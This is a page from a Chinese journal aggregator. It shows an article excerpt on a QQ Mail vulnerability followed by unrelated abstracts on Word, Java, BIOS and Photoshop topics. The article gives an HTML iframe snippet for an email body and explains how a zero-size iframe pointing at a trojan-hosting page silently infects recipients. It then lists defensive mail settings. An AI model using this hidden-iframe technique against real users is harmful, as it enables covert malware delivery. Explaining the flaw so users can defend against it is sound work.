防不胜防——QQ Mail漏洞攻防演练

来源 :电脑知识与技术 | 被引量 : 0次 | 上传用户:ytfonrt
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  如今,使用QQ的用户非常多,为了方便,很多用户也一直使用QQ邮箱,毕竟在QQ聊天时就可以发邮件比另外打开网页发邮件要方便许多。但是,你可知道QQ邮箱也存在很多漏洞,即使你正常收发邮件,别人也能在“神不知,鬼不觉”的情况下让你运行木马。下面我们看看是如何实现的,以及如何防范。
  
  一、QQ 邮箱漏洞攻击测试
  
  要实现利用QQ邮箱漏洞而让对方中木马,非常简单,只要进行以下的两步即可完成,而且没有什么技术含量:
  第一步:打开QQ邮箱,选择“新邮件”,输入收件人的地址,在邮件内容中输入:“<html><body><iframesrc="http://www.****.com.cn"width="200"height="100"></body></html>”(不含引号,中间的网址可以随意更换,注意一定要用半角的<>)。点击右上角的“HTML”按钮,“确定”。(图1)
  


  第二步:再次点击HTML”按钮,这时你可以看到网页的预览,然后发送邮件。
  对方接收到邮件后,不管所用的系统(包括Windows XP SP2在内),都会弹出上面设定大小的网站广告窗口(其中width="200" height="100"就是设定弹出窗口的大小的。)。(图2)
  


  看到这里,可能很多朋友都已经明白如何实现攻击,顺利将木马发送到被攻击者邮件中了。
  具体实现方法是:黑客把上面的代码修改为<html><body><iframe src="包含有木马的网页" width="0" height="0",这样就可以将短小的木马捆绑在指定的网页中,只要用户点击邮件,就非常容易就把木马种植到被入侵者的机器上了,打开邮件后,木马已经在运行了。
  
  提示: width="0" height="0",这表示宽度和高度都为零,这样即可实现隐藏的目的,而让木马悄无声息地运行。
  
  二、如何防范QQ邮箱的漏洞
  
  上面给大家介绍了一个非常简单的攻击实例,也是很多喜欢使用QQ邮箱最容易受到攻击的途径,如何进行有效的防范呢?当然最有效的方式就是不要随意打开不熟悉的邮箱发来的邮件,除此以外,我们还可以从以下几个方面来加强防范。
  
  1.使用QQ Mail的远程控制
  QQ Mail提供了与Foxmail相似的“远程管理”功能,而且使用方法很简单:打开QQ Mail后,按下F12键,打开“远程管理”窗口。如果邮件中有诸如“腾讯会员通知”、“你中奖啦”等主题直接删除即可,这些邮件即便不包含病毒,也多是垃圾信息。
  
  2.使用QQ Mail的邮件规则
  利用QQ Mail的邮件规则,我们可以更进一步保护好自己的系统。
  打开QQ Mail,选择菜单中的“工具→邮件过滤规则”。 在弹出窗口中点击“新建”按钮,接着在“过滤项”下选择“非QQ邮件”,点击“确定”。再次点击“新建”按钮,在“过滤项”下选择“非地址簿中用户发来的邮件”,然后在地址簿中加上你信任的QQ好友邮箱即可。 (图3)
  


其他文献
我们在撰写科技类文章时,常常使用图表和公式,其序号的编排却令人抓狂——添加或删除其中一个,修改处之后的所有序号就需要重新编排,正所谓牵一发而动全身。然而文章千古事,一篇文章从初稿到发表往往要改上十来遍甚至几十遍,即便短文章,如此“土法炼钢”也难免不胜其烦,出现疏忽,更别说毕业论文和书籍排版了。下面给大家介绍的几种方法将有效地解决这个问题。    1.图表的自动编号和索引    Word中的“题注”
期刊
摘要:介绍了类比方法在学习新知识的重要作用。论述了Java教学中的应用运用类比方法的必要性;叙述了在Java教学中常用几种类比方法;举例分析了模型类比方法和等效类比法方法在Java平台无关性和授权事件模型中的应用。  关键词:类比;授权事件模型;平台无关性  中圖分类号:TPG642文献标识码:A文章编号:1009-3044(2006)23-0218-02
期刊
故障现象:某客户在购买IEEE1394视频采集卡后,电脑系统有些不稳定,于是尝试刷新BIOS,结果开机不久出现黑屏现象,系统无法正常启动。  故障分析:赶到客户家中,因为故障出现在刷新BIOS后,所以新刷的BIOS的嫌疑最大。由于刷新的过程中没有出现异常,于是笔者开机仔细检查了开机画面,发现BIOS文件并无错误。为保险起见,又从网上下载了原主板的BIOS文件并利用软盘输入,结果重启后系统仍然无法正
期刊
久居城市,身处钢筋水泥大楼之中,总是会感觉一些疲惫。很想投入大自然的怀抱,与花鸟为友,与大树为伴,让身心得到彻底的解放。外出旅游就能让这一切变为现实,如果还能带上自己心爱的数码相机,那就太好了! 数码相机让摄影这件事情变得好像简单,按动快门,凝固瞬间,但是你将这件事做好并不是那么轻松的。对于我们这些爱好者来说,不可能像专业摄影师那样,能走访名山大川。不过虽然我们没有这么多外出拍摄的机会,但是利用旅
期刊
友立公司的Ulead VideoStudio 9 中文版(以下简称《会9》),功能更为全面,操作更容易上手。它提供了三种不同的编辑模式,以适应不同制作水平的制作者使用。喜欢DV拍摄的朋友可使用它,把历年拍摄的家庭录像整理打造成一张张珍藏专辑影片,留住那美好的回忆。    一、多快好省-利用场景模板快速制作    所谓场景模板,就是事先制作好片头片尾的电影格式,用户只要添加自己的视频素材后选用合适的
期刊
摘要:宽带ADSL上网是一般学校目前使用最广的上网方案之一。本文根据学校规模的不同,设计了六種ADSL宽带上网方案。这些方案对基本上能解决一般中小学上网的需要。  关键词:学校;ADSL;宽带;共享;方案  中图分类号:TP393 文献标识码:A文章编号:1009-3044(2006)23-207-02
期刊
初级篇    第一步:先打开MM的数码相片文件,点击工具面板中的“磁性套索”工具,设置“羽化”值为2个象素,勾画MM衣服,形成选区,如图1所示。勾画时尽量小心,在分界不明显的地方,要多单击几次,增加锚点。  第二步:选择完成后,按下“Ctrl+J”快捷键,复制衣服选区到新的图层“图层1”。  第三步:打开要改换的衣服花色文件,把该花色所在的图层拖到MM的相片文件中,形成一个新的在最上方的图层“图层
期刊
Captivate软件是Macromedia出品的专业的影像捕捉工具,可以利用该软件轻轻松松创建交互式模拟和软件演示。Captivate软件最早由Flash Cam伊始,后来这个软件归Ehelp公司拥有,更名为RoboDemo。RoboDemo很快又被Macromedia公司收购,根据市场发展策略的需要,Macromedia公司对软件进行了二次研发与升级,并将其更名为Macromedia Capt
期刊
随着QQ2006Beta1版强势登录,腾讯继QQ秀推出更酷炫的3DQQ秀,它能在鼠标的控制下以任意角度旋转,还可通过3D炫展现忍俊不禁的丰富表情,更兼有任意缩放神通。可是如此时尚前卫的功能只有QQ的红钻贵族能免费享用,这让不少Q迷黯然神伤。别担心,抓紧时间申请并绑定iCoke帐号,普通QQ用户也可免费体验3DQQ秀。    首先打开http://icoke.qq.com/index.shtml 页
期刊
GHOST是大家所熟知的硬盘数据备份工具,它具有硬盘克隆、分区备份、系统安装等功能。最让网络管理员兴奋的是,较新版本的GHOST提供了通过TCP/IP网络,从一台GHOST服务器向多台电脑同时克隆硬盘数据的功能,这就是GHOST的多播技术。GHOST的多播技术可以快速地帮助用户安装或升级大量电脑的操作系统,使系统维护人员从烦琐重复的劳动中解放出来。    提示  通用TCP/IP网络启动盘的下载网
期刊